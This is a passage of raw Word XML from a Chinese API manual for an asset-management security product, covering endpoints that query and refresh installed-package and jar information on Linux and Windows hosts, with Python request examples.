              <w:t>软件发布者(仅windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="02728BD4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="421482F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27F10ACC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6537F3CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E90C216" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>安装路径(仅windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="30AFF780" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F6B0294" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>productVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="474EDB4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="374033B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="350C373D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>安装版本(仅windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="41243FE0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69B6C942" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pkgSize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2453C810" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D2ED48C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="489CC451" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>软件大小(仅windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26B35629" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>安装包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FD17F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pkg_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/api/assets/pkg/linux?name=bash-completion&amp;version=1:2.1-4.2ubuntu1&amp;installTime=2018-06-27%%2000:00:00%%20-%%202018-06-29%%2000:00:00&amp;type=dpkg" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'name': 'bash-completion', 'version': '1:2.1-4.2ubuntu1', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>installTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': '2018-06-27 00:00:00 - 2018-06-29 00:00:00', 'type': '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dpkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308C6978" w14:textId="2CBFA12C" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>对于签名的部分，有疑问可以参考</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:instrText>HYPERLINK \l "身份认证" \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:t>身份认证</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:hyperlink w:anchor="请求签名">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>请求签名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>，对于完整的模拟请求参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="启动项信息查询结果">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>启动项信息查询结果</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>的windows代码示例(python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B6F02C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>win安装包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262877B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pkg_win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"http://%s:%s/external/api/assets/pkg/win?name=Google%%20Chrome%%20Canary&amp;publisher=Google%%20Inc.&amp;installTime=2018-05-29%%2000:00:00%%20-%%202018-06-01%%2000:00:00&amp;size=1&amp;productVersion=69.0.3444.1&amp;path=C:%%5cUsers%%5cadmin.ZHONGYANGLI%%5cAppData%%5cLocal%%5cGoogle%%5cChrome%%20SxS%%5cApplication" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'name': 'Google Chrome Canary', 'publisher': 'Google Inc.', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>installTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': '2018-05-29 00:00:00 - 2018-06-01 00:00:00', 'size': 1, '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>productVersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': '69.0.3444.1','path': 'C:\Users\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>admin.QINGTENG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">\Local\Google\Chrome </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SxS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Application'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79857601" w14:textId="419E6590" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>对于签名的部分，有疑问可以参考</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:instrText>HYPERLINK \l "身份认证" \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:t>身份认证</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:hyperlink w:anchor="请求签名">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>请求签名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>，对于完整的模拟请求参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="启动项信息查询结果">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>启动项信息查询结果</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>的windows代码示例(python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100CEBFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_Toc115166145"/>
      <w:bookmarkStart w:id="142" w:name="安装包信息扫描"/>
      <w:bookmarkEnd w:id="140"/>
      <w:r>
        <w:t>安装</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w14:paraId="5AC62AD7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求安装</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F666373" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160241D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/pkg/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win|linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA3BF52" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EFA92B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4039C48B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0335CDF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/pkg/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422AF217" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04963E25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DAB722" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB054D6"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66B38C80"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1483673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12206F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6171B387" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="620129AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61A866FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="51EC3E89" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="101AFC54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="764ECC19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47F8D404" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FEA7DE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F27FC23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>安装</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C00B9E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>refresh(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/pkg/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E8E866" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例：</w:t>
      </w:r>
      <w:r>
        <w:t>win安装</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C287947" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>refresh(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/pkg/win/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C18C1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="_Toc115166146"/>
      <w:bookmarkStart w:id="144" w:name="安装包信息查询扫描状态"/>
      <w:bookmarkEnd w:id="142"/>
      <w:r>
        <w:t>安装</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
    </w:p>
    <w:p w14:paraId="0728D6A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询安装</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BEAAC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_Toc115166147"/>
      <w:bookmarkStart w:id="146" w:name="jar包信息"/>
      <w:bookmarkEnd w:id="138"/>
      <w:bookmarkEnd w:id="144"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jar包信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
    </w:p>
    <w:p w14:paraId="61A9F798" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508C6C9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于查询资产中的jar包信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362FC08A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
